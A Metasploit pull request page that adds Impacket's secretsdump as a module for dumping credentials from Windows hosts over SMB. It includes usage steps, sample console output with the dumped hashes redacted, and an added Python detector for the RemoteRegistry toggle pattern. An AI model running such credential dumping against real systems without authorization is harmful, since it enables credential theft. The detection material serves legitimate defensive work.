Add the scanner/smb/impacket/secretsdump module #10107

Merged
merged 2 commits into from Jul 6, 2018

zeroSteiner commented May 27, 2018

This adds Impacket's secretsdump as an external module. The basic options were kept and carried over to the module version. The different settings are noted in the markdown documentation. This information was carried over from the original tool.

This uses the same _msf_impacket.py library introduced for the dcomexec module added in PR #9816.

Verification

List the steps needed to make sure this thing works

  • Install Impacket v0.9.17 from GitHub. The impacket package must be
    in Python's module path, so import impacket works from any directory.
  • Install pycrypto v2.7 (the experimental release). Impacket requires
    this specific version.
  • Start msfconsole
  • Do: use auxiliary/scanner/smb/impacket/secretsdump
  • Set: RHOSTS, SMBUser, SMBPass
  • Do: run, see credential data
  • Do: info -d, see the module documentation and ensure it makes sense

Example Output

metasploit-framework (S:0 J:1) auxiliary(scanner/smb/impacket/secretsdump) > show options 

Module options (auxiliary/scanner/smb/impacket/secretsdump):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   ExecMethod  smbexec          yes       The method to use for execution (Accepted: smbexec, wmiexec, mmcexec)
   OutputFile                   no        Write the results to a file
   RHOSTS      192.168.90.11    yes       The target address range or CIDR identifier
   SMBDomain   .                no        The Windows domain to use for authentication
   SMBPass     wakawaka         yes       The password for the specified username
   SMBUser     spencer          yes       The username to authenticate as
   THREADS     1                yes       The number of concurrent threads

metasploit-framework (S:0 J:1) auxiliary(scanner/smb/impacket/secretsdump) > run

[*] [2018.04.04-17:15:45] Running for 192.168.90.11...
[*] [2018.04.04-17:15:45] 192.168.90.11 - Service RemoteRegistry is in stopped state
[*] [2018.04.04-17:15:45] 192.168.90.11 - Service RemoteRegistry is disabled, enabling it
[*] [2018.04.04-17:15:45] 192.168.90.11 - Starting service RemoteRegistry
[*] [2018.04.04-17:15:46] 192.168.90.11 - Retrieving class info for JD
[*] [2018.04.04-17:15:46] 192.168.90.11 - Retrieving class info for Skew1
[*] [2018.04.04-17:15:46] 192.168.90.11 - Retrieving class info for GBG
[*] [2018.04.04-17:15:46] 192.168.90.11 - Retrieving class info for Data
[REDACTED]
[*] [2018.04.04-17:15:48] 192.168.90.11 - Cleaning up... 
[*] [2018.04.04-17:15:48] 192.168.90.11 - Stopping service RemoteRegistry
[*] [2018.04.04-17:15:48] 192.168.90.11 - Restoring the disabled state for service RemoteRegistry
[*] [2018.04.04-17:15:48] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
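
For defenders, the RemoteRegistry enable/start/stop/restore sequence in the output above is a detectable pattern. The following is an added example, not part of the pull request or of Impacket: it looks for that cycle in Service Control Manager events (IDs 7040 and 7036). The sample events, host names and the 60-second window are constructed assumptions, and only the "service was disabled" case shown in the output is covered.

```python
import re
from datetime import datetime, timedelta

# Constructed sample: System-log Service Control Manager events (IDs 7040 and
# 7036) as (timestamp, host, event_id, message) tuples. Not taken from the page.
SAMPLE_EVENTS = [
    ("2018-04-04 17:15:45", "WS01", 7040, "The start type of the Remote Registry service was changed from disabled to demand start."),
    ("2018-04-04 17:15:45", "WS01", 7036, "The Remote Registry service entered the running state."),
    ("2018-04-04 17:15:48", "WS01", 7036, "The Remote Registry service entered the stopped state."),
    ("2018-04-04 17:15:48", "WS01", 7040, "The start type of the Remote Registry service was changed from demand start to disabled."),
    # Benign: an administrator enables the service and leaves it running.
    ("2018-04-04 09:00:00", "WS02", 7040, "The start type of the Remote Registry service was changed from disabled to auto start."),
    ("2018-04-04 09:00:02", "WS02", 7036, "The Remote Registry service entered the running state."),
]

STEPS = [  # (event id, pattern) in the order the module output shows them
    (7040, re.compile(r"Remote Registry service was changed from disabled to ")),
    (7036, re.compile(r"Remote Registry service entered the running state")),
    (7036, re.compile(r"Remote Registry service entered the stopped state")),
    (7040, re.compile(r"Remote Registry service was changed from .+ to disabled")),
]

def find_remote_registry_toggles(events, window=timedelta(seconds=60)):
    """Return (host, first_ts, last_ts) for each full enable/start/stop/disable cycle inside `window`."""
    per_host = {}
    for ts, host, event_id, message in events:
        per_host.setdefault(host, []).append((datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), event_id, message))
    hits = []
    for host, rows in per_host.items():
        rows.sort(key=lambda r: r[0])  # stable sort keeps log order for equal timestamps
        step, first = 0, None
        for ts, event_id, message in rows:
            if first is not None and ts - first > window:
                step, first = 0, None  # cycle took too long, start over
            want_id, pattern = STEPS[step]
            if event_id == want_id and pattern.search(message):
                first = first or ts
                step += 1
                if step == len(STEPS):
                    hits.append((host, first, ts))
                    step, first = 0, None
    return hits

if __name__ == "__main__":
    for host, start, end in find_remote_registry_toggles(SAMPLE_EVENTS):
        print(f"{host}: RemoteRegistry enabled and re-disabled between {start} and {end}")
```

A hit is a lead for correlation with the SMB logon that preceded it, since legitimate management tooling can produce the same cycle.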

@jrobles-r7 jrobles-r7 merged commit 7ac8af0 into rapid7:master Jul 6, 2018

3 checks passed

  • Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
  • Metasploit Automation - Test Execution: Successfully completed all tests.
  • continuous-integration/travis-ci/pr: The Travis CI build passed

jrobles-r7 added a commit that referenced this pull request Jul 6, 2018

msjenkins-r7 added a commit that referenced this pull request Jul 6, 2018

tdoan-r7 commented Jul 17, 2018

Release Notes

The scanner/smb/impacket/secretsdump module has been added to the framework as an external module.
